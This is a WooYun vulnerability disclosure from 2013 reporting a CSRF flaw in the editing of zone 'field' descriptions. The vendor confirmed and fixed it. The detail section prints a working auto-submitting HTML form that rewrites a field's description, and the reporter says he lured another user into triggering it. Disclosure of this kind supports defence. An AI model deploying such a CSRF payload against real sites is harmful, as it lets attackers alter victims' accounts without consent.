当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-032529

漏洞标题:我是如何修改某帅哥领域的介绍的

相关厂商:乌云官方

漏洞作者: ‫‌

提交时间:2013-07-30 19:00

修复时间:2013-09-13 19:00

公开时间:2013-09-13 19:00

漏洞类型:CSRF

危害等级:中

自评Rank:6

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-07-30: 细节已通知厂商并且等待厂商处理中
2013-07-30: 厂商已经确认,细节仅向厂商公开
2013-08-09: 细节向核心白帽子及相关领域专家公开
2013-08-19: 细节向普通白帽子公开
2013-08-29: 细节向实习白帽子公开
2013-09-13: 细节向公众公开

简要描述:

压力好大.

详细说明:

领域信息修改没有做token验证,导致CSRF...

<meta charset="utf-8">
<form action="http://zone.wooyun.org/index.php?do=action&act=editfield" method="post" enctype="multipart/form-data">
<input type="hidden" name="fieldId" value="30" />
<input name="fieldKey" type="hidden" value="protect" />
<input name="fieldName" type="hidden" value="如何保护自己" />
<input name="fieldImg" type="file" />
<input name="authType" type="hidden" value="0">
<input name="description" type="hidden" value="By 0x0F">
<input name="reading" type="hidden" value="">
</form>
<script>
document.forms[0].submit();
</script>

漏洞证明:

忽悠@safe121 点了我的页面。于是结果是这样的。

hehe


真不是故意的。

修复方案:

我好像暴露马甲了。

版权声明:转载请注明来源 ‫‌@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2013-07-30 19:14

厂商回复:

确认问题存在,并已修复。

最新状态:

暂无